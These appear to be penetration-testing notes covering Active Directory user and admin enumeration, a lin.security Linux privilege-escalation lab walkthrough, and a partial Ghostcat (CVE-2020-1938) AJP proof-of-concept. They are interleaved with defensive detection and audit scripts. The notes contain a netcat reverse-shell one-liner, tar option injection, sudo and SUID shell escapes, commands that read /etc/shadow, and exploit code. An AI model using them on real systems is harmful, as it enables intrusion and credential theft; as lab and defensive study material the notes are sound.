smb-enum-users.nse: requires access to a host, but cannot obtain more domain user information.
smb-enum-shares.nse: enumerates the shared directories of the remote host.
smb-enum-process.nse: enumerates the processes of the remote host.
smb-os-discovery: information on the host's operating system, computer name, domain name, forest name, NetBIOS machine name, workgroup, system time, etc.

PowerView scripts

Invoke-StealthUserHunter
Invoke-UserHunter

Empire's user_hunter module

usemodule situational_awareness/network/powerview/user_hunter

Finding domain administrator processes

Local check

Get the domain administrator list:
net group "Domain Admins" /domain

List all local processes and their users:
tasklist /v

Query domain user sessions on the domain controller

https://github.com/nullbind/Other-Projects/tree/master/GDA

Query tasks running on remote systems

First, collect the domain administrator list from the Domain Admins group. Then add the target IPs to ips.txt and the collected domain administrator list to names.txt.
FOR /F %i in (ips.txt) DO @echo [+] %i && @tasklist /V /S %i /U user /P password 2>NUL > output.txt && FOR /F %n in (names.txt) DO @type output.txt | findstr %n > NUL && echo [!] %n was found running a process on %i && pause

Scanning remote systems for NetBIOS information

First, collect the domain administrator list from the Domain Admins group. Then add the target IPs to ips.txt and the collected domain administrator list to admins.txt.

for /F %i in (ips.txt) do @echo [+] Checking %i && nbtstat -A %i 2>NUL >> nbsessions.txt && FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n > NUL && echo [!] %n was found logged into %i

BloodHound

brew services start neo4j

Collectors

https://github.com/BloodHoundAD/BloodHound/tree/master/Ingestors

SharpHound.exe -c all
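From the defender's side, the enumeration sequence in this post is noisy: a burst of discovery commands from one account on one host is itself a detectable pattern in process-creation telemetry (Sysmon event 1 or Security event 4688). The following Python is an added example, not part of the original post; it runs a small set of regexes for the command families listed above over constructed process-creation events (timestamp, host, user, parent image, command line; hosts, users and times are made up) and raises an alert when one actor runs four or more distinct discovery categories within ten minutes. The window and threshold are assumptions to tune for the environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation events (not from any real host). WS01 mirrors the
# enumeration sequence described above; WS02 is a user running two commands hours apart.
SAMPLE_EVENTS = """timestamp,host,user,parent_image,command_line
2024-05-01T09:00:01,WS01,TESTLAB\\eviluser,cmd.exe,ipconfig /all
2024-05-01T09:00:05,WS01,TESTLAB\\eviluser,cmd.exe,whoami /all
2024-05-01T09:00:09,WS01,TESTLAB\\eviluser,cmd.exe,net config workstation
2024-05-01T09:00:15,WS01,TESTLAB\\eviluser,cmd.exe,net time /domain
2024-05-01T09:00:22,WS01,TESTLAB\\eviluser,cmd.exe,net group "domain admins" /domain
2024-05-01T09:00:30,WS01,TESTLAB\\eviluser,cmd.exe,nltest /dclist:testlab.com
2024-05-01T09:00:41,WS01,TESTLAB\\eviluser,cmd.exe,net view /domain
2024-05-01T10:15:00,WS02,TESTLAB\\alice,explorer.exe,ipconfig /all
2024-05-01T14:30:00,WS02,TESTLAB\\alice,cmd.exe,net view /domain
"""

# One category per discovery command family from the post (case-insensitive).
RECON_PATTERNS = {
    "network_config": re.compile(r"^ipconfig\s+/all", re.I),
    "current_privileges": re.compile(r"^whoami(\s+/all)?$", re.I),
    "logon_domain": re.compile(r"^net\s+config\s+workstation", re.I),
    "domain_time": re.compile(r"^net\s+time\s+/domain", re.I),
    "domain_admins": re.compile(r"^net\s+group\s+['\"]?(domain|enterprise) admins['\"]?\s+/domain", re.I),
    "domain_controllers": re.compile(r"^nltest\s+/(dclist|domain_trusts)", re.I),
    "domain_hosts": re.compile(r"^net\s+view\s+/domain", re.I),
    "domain_users": re.compile(r"^net\s+user\s+/domain", re.I),
    "system_info": re.compile(r"^systeminfo\b", re.I),
    "sessions": re.compile(r"^(query\s+user|qwinsta)\b", re.I),
}


def classify(command_line):
    """Set of discovery categories a command line matches (empty if none)."""
    cmd = command_line.strip()
    return {name for name, rx in RECON_PATTERNS.items() if rx.search(cmd)}


def parse_events(text):
    events = []
    for line in text.strip().splitlines()[1:]:            # skip the header row
        ts, host, user, parent, cmd = line.split(",", 4)  # the command line may hold commas
        events.append((datetime.fromisoformat(ts), host, user, parent, cmd))
    return sorted(events)


def detect_recon_bursts(text, window=timedelta(minutes=10), threshold=4):
    """Alerts (host, user, window start, categories) for actors that run
    at least `threshold` distinct discovery categories within `window`."""
    hits = defaultdict(list)
    for ts, host, user, _, cmd in parse_events(text):
        categories = classify(cmd)
        if categories:
            hits[(host, user)].append((ts, categories))
    alerts = []
    for (host, user), actor_hits in hits.items():
        best, start = None, 0
        for end in range(len(actor_hits)):               # sliding window over this actor's hits
            while actor_hits[end][0] - actor_hits[start][0] > window:
                start += 1
            seen = set().union(*(c for _, c in actor_hits[start:end + 1]))
            if best is None or len(seen) > len(best[1]):
                best = (actor_hits[start][0], seen)
        if best and len(best[1]) >= threshold:
            alerts.append((host, user, best[0], sorted(best[1])))
    return alerts


if __name__ == "__main__":
    for host, user, started, categories in detect_recon_bursts(SAMPLE_EVENTS):
        print(f"[!] discovery burst on {host} by {user} from {started}: {', '.join(categories)}")
```

Counting distinct categories rather than raw command count keeps a single repeated `ipconfig /all` from alerting, while the sequence on WS01 trips the rule within its first minute.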
13. in.security privilege escalation lab

lin.security is a lab for privilege escalation caused by Linux configuration problems. It is an Ubuntu (18.04 LTS) Linux virtual machine that provides many privilege escalation vulnerabilities for practicing Linux permission concepts. Download link: https://in.security/downloads/lin.security_v1.0.ova

Low-privilege credentials for the lab: bob:secret
View the current user's privileges: whoami, id
View the distribution release and kernel version: lsb_release -a, uname -a

1 Privilege division on Linux

1.1 Users and groups

User groups play an important role on Linux systems: they give selected users an easy way to share files with each other, and they let system administrators manage permissions more efficiently by assigning permissions to groups rather than to individual users.

Linux users are divided into administrators and ordinary users, and ordinary users are further divided into system users and custom users.
System administrator: the root account, UID 0, holding all system permissions. It is similar to the administrator account on Windows and is the owner of the whole system.
System users: accounts built into the system for system management, usually created automatically during installation and unable to log in to the operating system. The UID is between 1 and 499 (1 to 999 on CentOS 7). Users such as sshd and pulse above are of this kind. They are similar to system accounts on Windows, though of course with far lower privileges.
Custom users: accounts created by the root administrator for users to log in to the system and work. The UID is 500 and above (1000 and above on CentOS 7). They are similar to accounts in the Users group on Windows.

Every user on Linux must belong to a group and cannot exist independently of one. On Linux every file has the concepts of owner, group and others.
Group information is kept in /etc/group.

1.2 The /etc/passwd file

Each user has one line in /etc/passwd recording the user's basic attributes. Administrators routinely change this file (normally through the user management tools) to manage accounts. Adding an account: useradd -g group -d /home/to/user -m username

Field meaning: Username : Password (x means the hash is kept in /etc/shadow) : UID : GID : Comment (GECOS) : Home directory : Login shell

1.3 The /etc/shadow file

Field meaning: Username : Encrypted password (! or * means the account cannot log in with a password; an empty field means no password is required) : Date of last change : Minimum days between changes : Maximum password age : Warning days before expiry : Grace days after expiry : Account expiry date : Reserved

The encrypted password has a fixed format: $id$salt$encrypted. id identifies the algorithm (1 = MD5, 5 = SHA-256, 6 = SHA-512), salt is a random value generated by the system, and encrypted is the hash of the password and salt. A 13-character value with no $ separators is the old DES-based crypt (descrypt).

1.4 File permissions

On Linux everything is a file: regular files, directories, devices, sockets and so on. rwx on a directory means:

r: permission to read the directory listing, i.e. the names of the files in it (ls)
w: permission to create, delete, rename, copy or move entries inside the directory
x: permission to enter the directory and make it the working directory. Without x, even w does not allow writing files into it.

1.5 Special permissions

SUID: when the file is executed, the process runs with the privileges of the file's owner.
SGID: when the file is executed, the process runs with the privileges of the file's group.
SBIT (sticky bit): set on a directory, only a file's owner (plus root and the directory's owner) can delete or rename that file, even if the directory is world-writable.

2 Privilege escalation through misconfigured sudo

sudo is a very common command: it lets an ordinary user run, as root, a command that otherwise only the superuser could run. "Command" here means a system command.
Since everything on Linux is a file, a system command is also a file. When an administrator needs a user to run a command with root privileges, they configure sudo, which concretely means editing /etc/sudoers. Ordinary users cannot read or edit that file; all they can do is check which sudo rules apply to them:

sudo -l

bob is allowed to run many commands, and several of them lead straight to root.

2.1 /bin/ash

2.2 /usr/bin/awk: read the password file /etc/shadow

2.3 /usr/bin/curl

2.4 /usr/bin/find: get a shell

sudo find . -exec /bin/sh \; -quit

So even a harmless search command like find yields root once it is allowed under sudo, as long as it can be coaxed into executing something. Space does not permit covering every command; https://gtfobins.github.io/ lists many binaries that can be abused this way.

3 A hash in /etc/passwd

Linux stores password hashes in /etc/shadow, which ordinary users cannot read. What they can read is /etc/passwd, where a line normally looks like:

root:x:0:0:root:/root:/bin/bash

If the second field is x, the hash lives in /etc/shadow; if it is an actual password hash, that hash is world-readable. On the lin.security machine there is an account named insecurity whose UID and GID are both 0 and whose second field holds a hash. Johnny or hash-identifier report it as descrypt, so it can be cracked; the recovered password is P@ssw0rd11.

4 Abusing a cron job together with wildcards

/etc/cron.daily/backup is run by cron every minute. It archives files with a wildcard, which allows local privilege escalation through tar option injection. Open a second ssh session as bob.
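Before the msfvenom and nc steps that follow, here is an added Python demonstration (not part of the original post, and not the lab's backup script) of why the wildcard is the problem. It recreates, in a temporary directory, the file names the steps below create in bob's home, shows the argument vector the shell would hand to a `tar czf backup.tgz *` run there, and contrasts it with a hardened invocation. tar itself is never executed; the glob expansion and option parsing are mimicked in Python.

```python
import os
import tempfile

# File names created in the writable directory, exactly as in the lab steps below.
PAYLOAD_NAMES = ["shell.sh", "--checkpoint=1", "--checkpoint-action=exec=sh shell.sh"]


def make_demo_dir():
    """Create a temporary directory (stand-in for bob's home) holding the payload files."""
    directory = tempfile.mkdtemp(prefix="wildcard-demo-")
    for name in PAYLOAD_NAMES + ["notes.txt"]:
        with open(os.path.join(directory, name), "w") as fh:
            fh.write("")
    return directory


def shell_glob(directory):
    """What an unquoted `*` expands to: non-hidden entries, sorted, one word each."""
    return sorted(n for n in os.listdir(directory) if not n.startswith("."))


def tar_argv_vulnerable(directory):
    """argv for the classic `tar czf backup.tgz *` executed inside `directory`."""
    return ["tar", "czf", "backup.tgz"] + shell_glob(directory)


def tar_argv_hardened(directory):
    """argv for `tar czf backup.tgz -- ./*`: `--` ends option parsing and the `./`
    prefix guarantees that no expanded name can begin with a dash."""
    return ["tar", "czf", "backup.tgz", "--"] + ["./" + n for n in shell_glob(directory)]


def injected_options(argv):
    """Words after the archive name that tar's option parser would consume as options.
    GNU getopt permutes options and operands, so position does not protect you;
    parsing only stops at a bare `--`."""
    found = []
    for word in argv[3:]:
        if word == "--":
            break
        if word.startswith("-"):
            found.append(word)
    return found


if __name__ == "__main__":
    d = make_demo_dir()
    print("vulnerable:", injected_options(tar_argv_vulnerable(d)))
    print("hardened:  ", injected_options(tar_argv_hardened(d)))
```

With the vulnerable form both `--checkpoint=1` and `--checkpoint-action=exec=sh shell.sh` reach tar as options, so the first checkpoint runs shell.sh with cron's privileges; with `-- ./*` the same directory yields no options at all.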
Use msfvenom to generate a netcat reverse shell one-liner (-p: payload, R: output raw):

root@kali:~# msfvenom -p cmd/unix/reverse_netcat lhost=127.0.0.1 lport=8888 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 91 bytes
mkfifo /tmp/kuhdq; nc 127.0.0.1 8888 0</tmp/kuhdq | /bin/sh >/tmp/kuhdq 2>&1; rm /tmp/kuhdq

lhost is 127.0.0.1 because the listener will run in the second bob session on the same machine. Then, in bob's home directory (the directory the backup job archives), run:

bob@linsecurity:~$ echo 'mkfifo /tmp/kuhdq; nc 127.0.0.1 8888 0</tmp/kuhdq | /bin/sh >/tmp/kuhdq 2>&1; rm /tmp/kuhdq' > shell.sh
bob@linsecurity:~$ chmod +x shell.sh
bob@linsecurity:~$ echo '' > '--checkpoint-action=exec=sh shell.sh'
bob@linsecurity:~$ echo '' > --checkpoint=1

Start the listener in the other session:

nc -lvnp 8888

From the tar manual:

--checkpoint[=NUMBER]        display a progress message every NUMBERth record (default 10)
--checkpoint-action=ACTION   execute ACTION on each checkpoint

--checkpoint-action names a program to run whenever a checkpoint is reached, which lets us run an arbitrary command. When the backup script expands its wildcard, the file names --checkpoint=1 and --checkpoint-action=exec=sh shell.sh are handed to tar as command-line options, and the next run of the cron job connects back to the listener with root privileges.

5 Hidden files

Hidden files sometimes hold sensitive information. Search the home directories for all hidden files and list them:

find / -name '.*' -type f -path '/home/*' -exec ls -al {} \; 2>/dev/null

The user susan has a hidden file .secret that contains her login password.

6 SUID

6.1 Method one

SUID is the set-user-ID bit, shown as an s in the owner's execute position. Permissions are usually written as three octal digits, e.g. 0755, and the leading digit carries the special bits.
Special permissions are not set by default, but when the superuser wants a program to run with root privileges on behalf of ordinary users, the bit is set. passwd is the classic example: it modifies /etc/shadow, which only root can write, so in principle only root could run it. To let ordinary users change their own password, the system gives passwd the SUID bit and restricts it to changing the caller's own password. Because passwd restricts itself, granting it SUID is safe; a SUID root program that does not restrict what it does is a privilege escalation waiting to happen.

To find every SUID file on the system:

find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null

Among the results is xxd, the command that dumps a file in hexadecimal. It is owned by root with the SUID bit set, and its group, itsservices, has execute permission. SUID root combined with execute permission for a group or for everyone is dangerous. id shows that susan belongs to itsservices, so as susan we can use it to read /etc/shadow (more usage in https://gtfobins.github.io/gtfobins/xxd/):

xxd '/etc/shadow' | xxd -r

Note: a SUID find escalates in the same way with find /dir -exec 'command'.

6.2 Method two

Besides xxd, another SUID file was found that is executable by others. It is not limited to a particular group, so it is even more dangerous.
https://gtfobins.github.io/gtfobins/taskset/#suid-enabled shows that this file, taskset, gives a shell directly.

7 NFS

Scan the ports to see which services are open:

nmap -sS -Pn -p- -A IP

Port 2049 is open: NFS. rpcinfo -p IP also shows whether the NFS service is registered, and showmount collects the details:

showmount -e IP     // exported directories
showmount IP        // connected hosts
showmount -d IP     // directories mounted by clients
showmount -a IP     // all mount points (host:directory)

The msf module auxiliary/scanner/nfs/nfsmount lists exports as well. peter's home directory is exported and can be mounted:

mkdir /mnt/peter
mount 192.168.68.99:/home/peter /mnt/peter/

In the mounted directory the files show owner 1001 and group 1005. Trying to create a file there fails with permission denied: even though we are root on the Kali attacker, the export uses root squashing by default, so the client's root is mapped to the anonymous user. The way around it is to impersonate the owner: create a group with GID 1005 and a user peter with UID 1001 and that GID on the attacker, then switch to peter. NFS only compares numeric IDs, so the server treats the client's peter as the real owner, and we can write our public key into .ssh/authorized_keys and log in with ssh as peter.

8 Privilege escalation via the docker group

peter belongs to the docker group:
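The checks in sections 1.3, 3 and 6 above (a hash sitting in /etc/passwd, a second UID 0 account, weak or empty hashes in /etc/shadow, and SUID binaries) can be automated. The following Python is an added example, not code from the original post or from the lab; the passwd and shadow lines are constructed samples shaped like the lab's files, with placeholder hash strings of the right length rather than real hashes, and the SUID scan runs over a temporary directory it creates itself.

```python
import os
import stat
import tempfile

# Constructed sample lines in the shape of the lab's files; the hash strings are
# placeholders of the right length, not real password hashes.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
bob:x:1000:1000:bob:/home/bob:/bin/bash
insecurity:AbCdEfGhIjKlM:0:0::/:/bin/sh
"""
SHADOW_SAMPLE = """\
root:$6$saltsalt$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:18000:0:99999:7:::
bob:$1$saltsalt$bbbbbbbbbbbbbbbbbbbbbb:18000:0:99999:7:::
guest::18000:0:99999:7:::
sshd:*:18000:0:99999:7:::
"""

CRYPT_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}


def hash_type(field):
    """Classify a password field from /etc/shadow (or one smuggled into /etc/passwd)."""
    if field == "":
        return "empty: login without a password"
    if field == "x":
        return "x: hash is in /etc/shadow"
    if field.startswith(("!", "*")):
        return "locked: no password login"
    if field.startswith("$"):
        return CRYPT_IDS.get(field.split("$")[1], "unknown $id$")
    if len(field) == 13:
        return "descrypt (traditional DES crypt)"
    return "unrecognised"


def audit_passwd(text):
    """Flag extra UID 0 accounts and hashes stored in the world-readable passwd file."""
    findings = []
    for line in text.splitlines():
        name, pw, uid, _gid = line.split(":")[:4]
        if uid == "0" and name != "root":
            findings.append(f"{name}: extra UID 0 account")
        if pw not in ("x", "*", "!"):
            findings.append(f"{name}: password field holds a {hash_type(pw)} hash, readable by everyone")
    return findings


def audit_shadow(text):
    """Flag accounts with no password or with fast-to-crack hash types."""
    findings = []
    for line in text.splitlines():
        name, pw = line.split(":")[:2]
        kind = hash_type(pw)
        if kind.startswith(("empty", "descrypt", "md5crypt")):
            findings.append(f"{name}: {kind}")
    return findings


def find_suid(root):
    """Walk `root` and return regular files with the set-user-ID bit,
    the same set `find / -perm -4000 -type f` prints."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for f in files:
            path = os.path.join(dirpath, f)
            st = os.lstat(path)
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def make_demo_tree():
    """Temporary tree holding one SUID stand-in (named after the lab's xxd) and one plain file."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    suid = os.path.join(root, "xxd")
    plain = os.path.join(root, "readme")
    for p in (suid, plain):
        open(p, "w").close()
    os.chmod(suid, 0o4755)
    os.chmod(plain, 0o644)
    return root, suid


if __name__ == "__main__":
    print(audit_passwd(PASSWD_SAMPLE))
    print(audit_shadow(SHADOW_SAMPLE))
    demo_root, _ = make_demo_tree()
    print(find_suid(demo_root))
```

On a real host, feed the functions the contents of /etc/passwd (readable) and, once you have root or a SUID reader like xxd, /etc/shadow, and point find_suid at / to reproduce the find results from section 6.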
14. CVE-2020-1938: Apache Tomcat AJP file inclusion (Ghostcat)

Reproducing the vulnerability

Environment

docker-compose.yml:

version: '2'
services:
  tomcat:
    image: vulhub/tomcat:9.0.30
    ports:
      - "8080:8080"
      - "8009:8009"

Start the container:

docker-compose up -d

POC

Source: https://github.com/nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC

The original author's POC only reads files. Changing self.req_uri=req_uri to self.req_uri=req_uri + '.jsp' makes Tomcat process the included file as JSP, turning the read into file inclusion so that a reverse shell can be obtained. The listing below is the POC's AJP client; it is cut off on this page in the middle of prepare_ajp_forward_request.

#!/usr/bin/env python
import struct
import socket
from io import BytesIO as StringIO  # added: parse() wraps the packet in a byte stream; not imported in the page's listing

# Some references:
# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html


def pack_string(s):
    if s is None:
        return struct.pack('>h', -1)
    l = len(s)
    return struct.pack('>H%dsb' % l, l, s.encode('utf8'), 0)


def unpack(stream, fmt):
    size = struct.calcsize(fmt)
    buf = stream.read(size)
    return struct.unpack(fmt, buf)


def unpack_string(stream):
    size, = unpack(stream, '>h')
    if size == -1:  # null string
        return None
    res, = unpack(stream, '%ds' % size)
    stream.read(1)  # \0
    return res


class NotFoundException(Exception):
    pass


class AjpBodyRequest(object):
    # server == web server, container == servlet
    SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
    MAX_REQUEST_LENGTH = 8186

    def __init__(self, data_stream, data_len, data_direction=None):
        self.data_stream = data_stream
        self.data_len = data_len
        self.data_direction = data_direction

    def serialize(self):
        data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH)
        if len(data) == 0:
            return struct.pack('>bbH', 0x12, 0x34, 0x00)
        else:
            res = struct.pack('>H', len(data))
            res += data
        if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER:
            header = struct.pack('>bbH', 0x12, 0x34, len(res))
        else:
            header = struct.pack('>bbH', 0x41, 0x42, len(res))
        return header + res

    def send_and_receive(self, socket, stream):
        while True:
            data = self.serialize()
            socket.send(data)
            r = AjpResponse.receive(stream)
            while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != AjpResponse.SEND_HEADERS:
                r = AjpResponse.receive(stream)
            if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4:
                break


class AjpForwardRequest(object):
    _, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range(28)
    REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE, 'TRACE': TRACE}
    # server == web server, container == servlet
    SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
    COMMON_HEADERS = ['SC_REQ_ACCEPT', 'SC_REQ_ACCEPT_CHARSET', 'SC_REQ_ACCEPT_ENCODING', 'SC_REQ_ACCEPT_LANGUAGE', 'SC_REQ_AUTHORIZATION', 'SC_REQ_CONNECTION', 'SC_REQ_CONTENT_TYPE', 'SC_REQ_CONTENT_LENGTH', 'SC_REQ_COOKIE', 'SC_REQ_COOKIE2', 'SC_REQ_HOST', 'SC_REQ_PRAGMA', 'SC_REQ_REFERER', 'SC_REQ_USER_AGENT']
    ATTRIBUTES = ['context', 'servlet_path', 'remote_user', 'auth_type', 'query_string', 'route', 'ssl_cert', 'ssl_cipher', 'ssl_session', 'req_attribute', 'ssl_key_size', 'secret', 'stored_method']

    def __init__(self, data_direction=None):
        self.prefix_code = 0x02
        self.method = None
        self.protocol = None
        self.req_uri = None
        self.remote_addr = None
        self.remote_host = None
        self.server_name = None
        self.server_port = None
        self.is_ssl = None
        self.num_headers = None
        self.request_headers = None
        self.attributes = None
        self.data_direction = data_direction

    def pack_headers(self):
        self.num_headers = len(self.request_headers)
        res = struct.pack('>h', self.num_headers)
        for h_name in self.request_headers:
            if h_name.startswith('SC_REQ'):
                code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1
                res += struct.pack('>BB', 0xA0, code)
            else:
                res += pack_string(h_name)
            res += pack_string(self.request_headers[h_name])
        return res

    def pack_attributes(self):
        res = b''
        for attr in self.attributes:
            a_name = attr['name']
            code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1
            res += struct.pack('>b', code)
            if a_name == 'req_attribute':
                aa_name, a_value = attr['value']
                res += pack_string(aa_name)
                res += pack_string(a_value)
            else:
                res += pack_string(attr['value'])
        res += struct.pack('>B', 0xFF)
        return res

    def serialize(self):
        res = struct.pack('>bb', self.prefix_code, self.method)
        res += pack_string(self.protocol)
        res += pack_string(self.req_uri)
        res += pack_string(self.remote_addr)
        res += pack_string(self.remote_host)
        res += pack_string(self.server_name)
        res += struct.pack('>h', self.server_port)
        res += struct.pack('?', self.is_ssl)
        res += self.pack_headers()
        res += self.pack_attributes()
        if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER:
            header = struct.pack('>bbh', 0x12, 0x34, len(res))
        else:
            header = struct.pack('>bbh', 0x41, 0x42, len(res))
        return header + res

    def parse(self, raw_packet):
        stream = StringIO(raw_packet)
        self.magic1, self.magic2, data_len = unpack(stream, '>bbH')
        self.prefix_code, self.method = unpack(stream, '>bb')
        self.protocol = unpack_string(stream)
        self.req_uri = unpack_string(stream)
        self.remote_addr = unpack_string(stream)
        self.remote_host = unpack_string(stream)
        self.server_name = unpack_string(stream)
        self.server_port, = unpack(stream, '>h')
        self.is_ssl, = unpack(stream, '?')
        self.num_headers, = unpack(stream, '>H')
        self.request_headers = {}
        for i in range(self.num_headers):
            code, = unpack(stream, '>H')
            if code > 0xA000:
                h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001]
            else:
                h_name, = unpack(stream, '%ds' % code)
                stream.read(1)  # \0
            h_value = unpack_string(stream)
            self.request_headers[h_name] = h_value

    def send_and_receive(self, socket, stream, save_cookies=False):
        res = []
        i = socket.sendall(self.serialize())
        if self.method == AjpForwardRequest.POST:
            return res
        r = AjpResponse.receive(stream)
        assert r.prefix_code == AjpResponse.SEND_HEADERS
        res.append(r)
        if save_cookies and 'Set-Cookie' in r.response_headers:
            self.request_headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie']
        # read body chunks and end response packets
        while True:
            r = AjpResponse.receive(stream)
            res.append(r)
            if r.prefix_code == AjpResponse.END_RESPONSE:
                break
            elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK:
                continue
            else:
                raise NotImplementedError
        return res


class AjpResponse(object):
    _, _, _, SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7)
    COMMON_SEND_HEADERS = ['Content-Type', 'Content-Language', 'Content-Length', 'Date', 'Last-Modified', 'Location', 'Set-Cookie', 'Set-Cookie2', 'Servlet-Engine', 'Status', 'WWW-Authenticate']

    def parse(self, stream):
        # read headers
        self.magic, self.data_length, self.prefix_code = unpack(stream, '>HHb')
        if self.prefix_code == AjpResponse.SEND_HEADERS:
            self.parse_send_headers(stream)
        elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK:
            self.parse_send_body_chunk(stream)
        elif self.prefix_code == AjpResponse.END_RESPONSE:
            self.parse_end_response(stream)
        elif self.prefix_code == AjpResponse.GET_BODY_CHUNK:
            self.parse_get_body_chunk(stream)
        else:
            raise NotImplementedError

    def parse_send_headers(self, stream):
        self.http_status_code, = unpack(stream, '>H')
        self.http_status_msg = unpack_string(stream)
        self.num_headers, = unpack(stream, '>H')
        self.response_headers = {}
        for i in range(self.num_headers):
            code, = unpack(stream, '>H')
            if code <= 0xA000:  # custom header
                h_name, = unpack(stream, '%ds' % code)
                stream.read(1)  # \0
                h_value = unpack_string(stream)
            else:
                h_name = AjpResponse.COMMON_SEND_HEADERS[code - 0xA001]
                h_value = unpack_string(stream)
            self.response_headers[h_name] = h_value

    def parse_send_body_chunk(self, stream):
        self.data_length, = unpack(stream, '>H')
        self.data = stream.read(self.data_length + 1)

    def parse_end_response(self, stream):
        self.reuse, = unpack(stream, '>b')

    def parse_get_body_chunk(self, stream):
        rlen, = unpack(stream, '>H')
        return rlen

    @staticmethod
    def receive(stream):
        r = AjpResponse()
        r.parse(stream)
        return r


def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET):
    fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER)
    fr.method = method
    fr.protocol = 'HTTP/1.1'
    fr.req_uri = req_uri
    fr.remote_addr = target_host
    fr.remote_host = None
    fr.server_name = target_host
    fr.server_port = 80
    fr.request_headers = {
        'SC_REQ_ACCEPT': 'text/html',
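The POC above is cut off before the part that matters for Ghostcat: the req_attribute entries it adds to the Forward Request. The following Python is an added example, not the POC's code and not from the original post. It builds a minimal AJP13 Forward Request carrying the three javax.servlet.include.* attributes the attack relies on, parses such a packet back, and doubles as a detector: any packet on port 8009 that carries those attributes is an inclusion attempt, since a reverse proxy never sets them. The attribute codes and string encoding follow the AJP13 specification the POC references; nothing is sent over the network.

```python
import struct

# AJP13 constants (https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html)
MAGIC_TO_CONTAINER = b"\x12\x34"
FORWARD_REQUEST = 0x02
METHOD_GET = 0x02
ATTR_REQ_ATTRIBUTE = 0x0A
ATTR_SSL_KEY_SIZE = 0x0B
ATTR_TERMINATOR = 0xFF
INCLUDE_PREFIX = "javax.servlet.include."

# The three request attributes Ghostcat smuggles in; the container treats them
# like the ones RequestDispatcher.include() sets and serves the named file.
GHOSTCAT_ATTRS = [
    (INCLUDE_PREFIX + "request_uri", "/"),
    (INCLUDE_PREFIX + "path_info", "WEB-INF/web.xml"),
    (INCLUDE_PREFIX + "servlet_path", "/"),
]


def pack_string(s):
    """AJP string: 2-byte big-endian length, UTF-8 bytes, NUL; None encodes as 0xFFFF."""
    if s is None:
        return struct.pack(">H", 0xFFFF)
    raw = s.encode("utf-8")
    return struct.pack(">H", len(raw)) + raw + b"\x00"


def unpack_string(buf, pos):
    (length,) = struct.unpack_from(">H", buf, pos)
    pos += 2
    if length == 0xFFFF:
        return None, pos
    return buf[pos:pos + length].decode("utf-8"), pos + length + 1  # skip the NUL


def build_forward_request(req_uri, req_attributes, server_name="localhost", server_port=8009):
    """Serialise a minimal web-server -> container Forward Request (GET, no headers)."""
    body = struct.pack(">BB", FORWARD_REQUEST, METHOD_GET)
    body += pack_string("HTTP/1.1") + pack_string(req_uri)
    body += pack_string("127.0.0.1") + pack_string(None)        # remote_addr, remote_host
    body += pack_string(server_name) + struct.pack(">H?", server_port, False)
    body += struct.pack(">H", 0)                                  # num_headers
    for name, value in req_attributes:
        body += struct.pack(">B", ATTR_REQ_ATTRIBUTE) + pack_string(name) + pack_string(value)
    body += struct.pack(">B", ATTR_TERMINATOR)
    return MAGIC_TO_CONTAINER + struct.pack(">H", len(body)) + body


def parse_forward_request(pkt):
    """Return (req_uri, [(attribute name, value), ...]) from a Forward Request packet."""
    if pkt[:2] != MAGIC_TO_CONTAINER:
        raise ValueError("not a web-server -> container packet")
    (length,) = struct.unpack_from(">H", pkt, 2)
    if length != len(pkt) - 4:
        raise ValueError("length field does not match packet size")
    pos = 4
    prefix, _method = struct.unpack_from(">BB", pkt, pos)
    pos += 2
    if prefix != FORWARD_REQUEST:
        raise ValueError("not a Forward Request")
    _protocol, pos = unpack_string(pkt, pos)
    req_uri, pos = unpack_string(pkt, pos)
    for _ in range(3):                                            # remote_addr, remote_host, server_name
        _s, pos = unpack_string(pkt, pos)
    pos += 3                                                      # server_port (2) + is_ssl (1)
    (num_headers,) = struct.unpack_from(">H", pkt, pos)
    pos += 2
    for _ in range(num_headers):
        (code,) = struct.unpack_from(">H", pkt, pos)
        if code & 0xFF00 == 0xA000:                               # coded common header name
            pos += 2
        else:                                                     # the 2 bytes are a string length
            _name, pos = unpack_string(pkt, pos)
        _value, pos = unpack_string(pkt, pos)
    attrs = []
    while pos < len(pkt):
        code = pkt[pos]
        pos += 1
        if code == ATTR_TERMINATOR:
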